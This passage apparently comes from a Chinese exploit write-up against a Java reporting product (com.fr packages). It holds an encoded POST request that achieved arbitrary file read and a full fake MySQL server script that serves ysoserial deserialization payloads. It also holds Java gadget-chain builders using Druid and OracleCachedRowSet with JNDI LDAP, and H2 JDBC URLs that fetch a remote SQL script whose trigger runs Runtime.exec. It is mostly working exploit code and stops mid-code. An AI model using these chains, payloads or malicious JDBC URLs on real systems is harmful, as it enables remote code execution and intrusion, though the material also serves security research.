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"
# Decode the literal above into the raw request body.  It begins with "H4sI",
# the base64 form of a gzip header, so the body is presumably a gzip stream
# posted under an application/json content-type — a mismatch worth alerting on.
burp0_data = base64.b64decode(b)
# verify=False only affects https; the URL above is plain http.
res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
# Response is decoded as GBK, silently dropping undecodable bytes.
print(res.content.decode("gbk", errors="ignore"))
任意文件读取成功,D:/1.txt内容为1111,
之后进行mysql反序列化时,将jdbc改为:jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_1_1,
然后重新生成base64编码的序列化数据,再用python发包,但未能成功,因为mysql组件版本为1.5.49,已经修复了反序列化。
使用其他的脚本来搭建mysql服务端,
# coding=utf-8
import socket
import binascii
import os
# Pre-built server packets as hex text; send_data() converts them with a2b_hex.
# greeting_data: the initial handshake packet.  It embeds the version string
# "5.7.19" (bytes 352e372e3139) and the auth plugin name "mysql_native_password".
greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
# response_ok_data: a generic OK packet, sent for the login and for SET statements.
response_ok_data="0700000200000002000000"
def receive_data(conn):
    """Read up to 1024 bytes from ``conn`` and return their lower-cased repr.

    The return value is ``str(bytes)``, i.e. the "b'...'" form rather than
    decoded text; callers match substrings against that representation.
    """
    received = conn.recv(1024)
    print("[*] Receiveing the package : {}".format(received))
    text = str(received)
    return text.lower()
def send_data(conn,data):
    """Hex-decode ``data`` (a hex string) and write the resulting bytes to ``conn``."""
    print("[*] Sending the package : {}".format(data))
    raw = binascii.a2b_hex(data)
    conn.send(raw)
def get_payload_content():
    """Return the serialized payload as a hex string.

    If a file named ``payload`` exists in the working directory, its bytes are
    hex-encoded and returned; otherwise a built-in constant is used.
    """
    # The payload file is produced with ysoserial: java -jar ysoserial [Gadget] [command] > payload
    file= r'payload'
    if not os.path.isfile(file):
        print("open false")
        #calc
        return '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'
    with open(file, 'rb') as f:
        payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
    print("open successs")
    return payload_content
# Main logic
def run():
    """Serve connections on the module-level listening socket ``sk`` forever.

    Each connection follows a fixed script rather than a real protocol state
    machine: send the canned greeting, answer the login with OK regardless of
    credentials, then reply to the connector's start-up queries from canned
    packets.  The reply to SHOW SESSION STATUS is a two-column result set whose
    second column is the hex payload from get_payload_content(); a client only
    turns that column into an object when its connector options ask for it (the
    autoDeserialize / ServerStatusDiffInterceptor settings that appear in the
    JDBC URL elsewhere in this write-up), so those options are what to audit on
    the client side.

    Matching is done on the lower-cased repr returned by receive_data().  The
    accepted socket is never closed here and one client is handled at a time.
    """
    while 1:
        conn, addr = sk.accept()
        print("Connection come from {}:{}".format(addr[0],addr[1]))
        # 1. Send the initial greeting (handshake) packet first.
        send_data(conn,greeting_data)
        while True:
            # Simulated login: 1. the client sends its login request,
            # 2. the server answers response_ok without checking anything.
            receive_data(conn)
            send_data(conn,response_ok_data)
            # Remaining exchange.
            data=receive_data(conn)
            # The client queries some configuration values; its version number is
            # sent in the process.
            if "session.auto_increment_increment" in data:
                _payload='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'
                send_data(conn,_payload)
                data=receive_data(conn)
            elif "show warnings" in data:
                _payload = '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'
                send_data(conn, _payload)
                data = receive_data(conn)
            if "set names" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "set character_set_results" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "show session status" in data:
                # Column count (2), then two column-definition packets (catalog "def").
                mysql_data = '0100000102'
                mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
                mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
                # Why does it stop working once I add an EOF packet??
                # Fetch the payload.
                payload_content=get_payload_content()
                # Payload length as 2 bytes, byte-swapped to little-endian; the
                # zfill(4)/slicing assumes the payload is shorter than 65536 bytes.
                payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
                payload_length_hex = payload_length[2:4] + payload_length[0:2]
                # Packet length (payload + 4 bytes of column prefixes) as 3-byte little-endian.
                data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
                data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
                # Row packet: sequence id 4, 0xfb (NULL) for the first column, then
                # 0xfc + 2-byte length prefix introducing the payload column.
                mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
                mysql_data += str(payload_content)
                # Trailing EOF packet (0xfe header).
                mysql_data += '07000005fe000022000100'
                send_data(conn, mysql_data)
                data = receive_data(conn)
            if "show warnings" in data:
                # Canned SHOW WARNINGS result (columns Level/Code/Message) whose only
                # row is a Note 1105 stating the status query was rewritten to
                # "select id,obj from ceshi.objs" by a query rewrite plugin.
                payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
                send_data(conn, payload)
            break
if __name__ == '__main__':
    HOST ='0.0.0.0'    # listens on every interface
    PORT = 3306
    # run() reads sk as a module global.
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # After the socket closes, the local port can be reused immediately, so
    # repeated experiments do not have to wait out TIME_WAIT.
    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sk.bind((HOST, PORT))
    sk.listen(1)
    print("start fake mysql server listening on {}:{}".format(HOST,PORT))
    run()
mysql组件反序列化依然不成功,说明的确是版本问题。
参考h2的jdbc利用:
https://m0d9.me/2021/04/26/Jdbc%E7%A2%8E%E7%A2%8E%E5%BF%B5%E4%B8%89%EF%BC%9A%E5%86%85%E5%AD%98%E6%95%B0%E6%8D%AE%E5%BA%93/
package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.swing.UIDefaults;
import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
public class Main {
public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
//Test test = new Test();
//User user = new User(test, "qqq");
DruidXADataSource druidXADataSource = new DruidXADataSource();
List> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
//JSONArray jsonArray_3 = new JSONArray(druidXADataSource);
//new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);
List> list_1 = new ArrayList<>(Arrays.asList(list_3));
List> list_2 = new ArrayList<>(Arrays.asList("1"));
JSONArray jsonArray_1 = new JSONArray(list_1);
JSONArray jsonArray_2 = new JSONArray(list_2);
UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 11);
putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);
//HashSet set = new LinkedHashSet();
//set.add(jsonArray_1);
//set.add(jsonArray_2);
//使用一个无害的InvokerTransformer
//InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
//TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);
//TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
//treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);
//TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
//treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);
Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
statLogger.setAccessible(true);
statLogger.set(druidXADataSource, null);
Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
transactionHistogram.setAccessible(true);
transactionHistogram.set(druidXADataSource, null);
Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
logWriter.setAccessible(true);
logWriter.set(druidXADataSource, null);
Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
initedLatch.setAccessible(true);
initedLatch.set(druidXADataSource, null);
Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
initialSize.setAccessible(true);
initialSize.set(druidXADataSource, 1);
//Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
//driverClass.setAccessible(true);
//driverClass.set(druidXADataSource, "javax.naming.InitialContext");
Field xaconnection = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
xaconnection.setAccessible(true);
//nc.exe -lvvp 6666 查看System.getProperty方法调取对应的value
//xaconnection.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
xaconnection.set(druidXADataSource, "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");
Hashtable
搭建1.4.192后发现是版本问题,此版本不能rce,将版本换成1.4.197后能rce
pom.xml
com.h2database
h2
1.4.192
Main.java:
package org.example;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.*;
public class Main {
    /**
     * Opens an H2 in-memory database whose JDBC URL carries an {@code INIT=RUNSCRIPT FROM 'http://...'}
     * clause, which H2 executes at connect time, so the SQL fetched from that URL runs before the
     * caller issues any statement.  The script referenced here (sql.sql) defines a trigger with a
     * JavaScript body; any code path that lets a caller influence the JDBC URL or its INIT parameter is
     * therefore a code-execution sink, which is the property this PoC demonstrates.
     *
     * @param args unused
     * @throws NotSerializableException etc. — the declared list appears to be carried over from an
     *         earlier version of this class; the body itself only raises the two caught types.
     */
    public static void main(String[] args) throws NotSerializableException, IllegalAccessException, NoSuchFieldException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
        String DRIVER_CLASS = "org.h2.Driver";
        // MODE=MSSQLServer selects a compatibility dialect; INIT= names the script run on connect.
        String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'";
        Properties info = null;   // no connection properties supplied
        try {
            Class.forName(DRIVER_CLASS);
            // The Connection is never closed; the in-memory database lives until the process exits.
            DriverManager.getDriver(JDBC_URL).connect(JDBC_URL, info);
        }catch (ClassNotFoundException | SQLException e) {
            e.printStackTrace();
        }
    }
}
sql.sql的内容:
-- Trigger source loaded by RUNSCRIPT: the $$//javascript marker makes H2 treat the
-- body as JavaScript source rather than SQL, and BEFORE SELECT ON
-- INFORMATION_SCHEMA.TABLES makes it fire ahead of any SELECT on that catalog view.
CREATE TRIGGER poc2 BEFORE SELECT ON
INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec("calc") $$;
或者直接在JDBC_URL上构造js语句:
// Variant of sql.sql with the trigger inlined in the init= parameter; the body is still JavaScript, not SQL.
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
        "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
        "java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')\n" +
        "$$\n";
生成base64编码的序列化数据,准备用python发包。
package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import oracle.jdbc.rowset.OracleCachedRowSet;
import org.apache.arrow.vector.util.JsonStringArrayList;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.swing.UIDefaults;
import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.SQLException;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
public class Main {
public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, SQLException {
OracleCachedRowSet oracleCachedRowSet_1 = new OracleCachedRowSet();
Field dataSourceName_1 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_1.setAccessible(true);
dataSourceName_1.set(oracleCachedRowSet_1, "ldap://127.0.0.1:4444/dc=example,dc=com");
OracleCachedRowSet oracleCachedRowSet_2 = new OracleCachedRowSet();
Field dataSourceName_2 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_2.setAccessible(true);
dataSourceName_2.set(oracleCachedRowSet_2, "ldap://127.0.0.1:4444/dc=example,dc=com");
JsonStringArrayList jsonStringArrayList_1= new JsonStringArrayList(2);
jsonStringArrayList_1.add(oracleCachedRowSet_1);
JsonStringArrayList jsonStringArrayList_2= new JsonStringArrayList(2);
jsonStringArrayList_2.add(oracleCachedRowSet_2);
UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, 1);
putmethod.invoke(textAndMnemonicHashMap_2, jsonStringArrayList_2, jsonStringArrayList_2);
Vector v_1 = new Vector();
v_1.add(0, "111");
v_1.add(1, "111");
Vector v_2 = new Vector();
v_2.add(0, "222");
v_2.add(1, "222");
String[] strings = new String[1];
strings[0] = "111";
Field metaData = OracleCachedRowSet.class.getDeclaredField("metaData");
metaData.setAccessible(true);
metaData.set(oracleCachedRowSet_1, strings);
metaData.set(oracleCachedRowSet_2, strings);
Field matchColumnNames = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnNames");
matchColumnNames.setAccessible(true);
matchColumnNames.set(oracleCachedRowSet_1, v_1);
matchColumnNames.set(oracleCachedRowSet_2, v_1);
Field matchColumnIndexes = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnIndexes");
matchColumnIndexes.setAccessible(true);
matchColumnIndexes.set(oracleCachedRowSet_1, v_2);
matchColumnIndexes.set(oracleCachedRowSet_2, v_2);
Field monitorLock = OracleCachedRowSet.class.getSuperclass().getDeclaredField("monitorLock");
monitorLock.setAccessible(true);
monitorLock.set(oracleCachedRowSet_1, null);
monitorLock.set(oracleCachedRowSet_2, null);
Hashtable
jndi服务端